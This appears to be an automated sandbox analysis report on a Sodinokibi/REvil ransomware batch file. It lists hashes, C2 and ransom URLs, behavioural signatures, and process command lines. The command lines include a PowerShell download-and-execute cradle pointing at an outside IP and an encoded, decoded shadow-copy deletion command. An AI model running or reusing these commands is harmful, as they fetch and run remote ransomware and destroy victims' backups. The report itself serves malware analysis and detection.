Analysis
- max time kernel: 136s
- max time network: 53s
- platform: windows7_x64
- resource: win7v200430
- submitted: 03-05-2020 01:10
Static task: static1
Behavioral task: behavioral1
- Sample: LVUCdSAS.bat
- Resource: win7v200430
Behavioral task: behavioral2
- Sample: LVUCdSAS.bat
- Resource: win10v200430
General
- Target: LVUCdSAS.bat
- Size: 191B
- MD5: 4d0d0cde7b92c8b97f2729cb95f08d3a
- SHA1: b77bbf7812e9295554ae54b2c35ef5304904f0f5
- SHA256: b17a151185d86157579c7ecd1903ddfd186f78f1b49899efefda2e943a6b755e
- SHA512: 5ab25f6b4ed8e39c876b939e28848546586c43d4349cd460dd9ed0948b495a000e8e237e0a67f8d14c6f23e88643eac89099c27169926106b91a1ab48bf7c706
Malware Config
Extracted
- http://185.103.242.78/pastes/LVUCdSAS
Extracted
- path: C:\59t0ty8-readme.txt
- family: sodinokibi
- http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/099343EE9A6C9A82
- http://decryptor.cc/099343EE9A6C9A82
Signatures
- Enumerates connected drives (3 TTPs)
- Makes http(s) request (1 IoCs)
  Contacts server via http/https, possibly for C2 communication.
  Processes (description | flow | ioc):
  - HTTP URL | 2 | http://185.103.242.78/pastes/LVUCdSAS
- Blacklisted process makes network request (1 IoCs)
  Processes (flow | pid | process):
  - 2 | 1480 | powershell.exe
- Suspicious use of WriteProcessMemory (5 IoCs)
  Processes (description | pid | process | target process):
  - PID 1312 wrote to memory of 1480 | 1312 | cmd.exe | powershell.exe
  - PID 1480 wrote to memory of 1696 | 1480 | powershell.exe | powershell.exe
  - PID 1480 wrote to memory of 1696 | 1480 | powershell.exe | powershell.exe
  - PID 1480 wrote to memory of 1696 | 1480 | powershell.exe | powershell.exe
  - PID 1480 wrote to memory of 1696 | 1480 | powershell.exe | powershell.exe
- Suspicious use of AdjustPrivilegeToken (7 IoCs)
  Processes (description | pid | process):
  - Token: SeDebugPrivilege | 1480 | powershell.exe
  - Token: SeDebugPrivilege | 1480 | powershell.exe
  - Token: SeDebugPrivilege | 1696 | powershell.exe
  - Token: SeBackupPrivilege | 752 | vssvc.exe
  - Token: SeRestorePrivilege | 752 | vssvc.exe
  - Token: SeAuditPrivilege | 752 | vssvc.exe
  - Token: SeTakeOwnershipPrivilege | 1480 | powershell.exe
- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  Processes (pid | process):
  - 1480 | powershell.exe
  - 1480 | powershell.exe
  - 1480 | powershell.exe
  - 1696 | powershell.exe
  - 1696 | powershell.exe
- Modifies service (2 TTPs, 4 IoCs)
  Processes (description | ioc | process):
  - Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe
  - Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
  - Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe
  - Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe
- Drops file in Program Files directory (26 IoCs)
  Processes (description | ioc | process):
  - File opened for modification | \??\c:\program files\OptimizeEdit.svg | powershell.exe
  - File opened for modification | \??\c:\program files\SearchBlock.vb | powershell.exe
  - File opened for modification | \??\c:\program files\ConvertFromAdd.vsx | powershell.exe
  - File opened for modification | \??\c:\program files\InitializeRestart.dib | powershell.exe
  - File opened for modification | \??\c:\program files\NewImport.inf | powershell.exe
  - File opened for modification | \??\c:\program files\SwitchUpdate.midi | powershell.exe
  - File opened for modification | \??\c:\program files\TraceSet.m4a | powershell.exe
  - File opened for modification | \??\c:\program files\UnregisterComplete.xht | powershell.exe
  - File opened for modification | \??\c:\program files\WatchResize.vstx | powershell.exe
  - File created | \??\c:\program files\59t0ty8-readme.txt | powershell.exe
  - File created | \??\c:\program files (x86)\59t0ty8-readme.txt | powershell.exe
  - File opened for modification | \??\c:\program files\BackupCompare.eprtx | powershell.exe
  - File opened for modification | \??\c:\program files\ResumeEdit.vsx | powershell.exe
  - File created | \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\59t0ty8-readme.txt | powershell.exe
  - File opened for modification | \??\c:\program files\DismountDebug.xltx | powershell.exe
  - File opened for modification | \??\c:\program files\InitializeCompare.mpeg2 | powershell.exe
  - File opened for modification | \??\c:\program files\InitializeShow.au | powershell.exe
  - File opened for modification | \??\c:\program files\LimitCopy.xlsb | powershell.exe
  - File created | \??\c:\program files\microsoft sql server compact edition\59t0ty8-readme.txt | powershell.exe
  - File opened for modification | \??\c:\program files\MoveRedo.asp | powershell.exe
  - File opened for modification | \??\c:\program files\ResumeSync.mp4v | powershell.exe
  - File opened for modification | \??\c:\program files\UnlockInstall.ods | powershell.exe
  - File opened for modification | \??\c:\program files\EnterRevoke.avi | powershell.exe
  - File opened for modification | \??\c:\program files\ExportSkip.dotm | powershell.exe
  - File opened for modification | \??\c:\program files\GetMove.ttf | powershell.exe
  - File created | \??\c:\program files\microsoft sql server compact edition\v3.5\59t0ty8-readme.txt | powershell.exe
- Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
  Processes (description | ioc | process):
  - Set value (str) | \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\6j4yy61v.bmp" | powershell.exe
- Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.
- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
  Processes (pid | process):
  - 1480 | powershell.exe
Processes
- C:\Windows\system32\cmd.exe (PID: 1312)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\LVUCdSAS.bat"
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID: 1480, child of 1312)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/LVUCdSAS');Invoke-KTVNSBAG;Start-Sleep -s 10000"
    - Blacklisted process makes network request
    - Suspicious use of WriteProcessMemory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
    - Drops file in Program Files directory
    - Sets desktop wallpaper using registry
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID: 1696, child of 1480)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (The -e argument is base64-encoded UTF-16LE; it decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} which is the shadow copy deletion that triggers the vssvc.exe activity below.)
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses
- C:\Windows\system32\vssvc.exe (PID: 752)
  Command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
  - Modifies service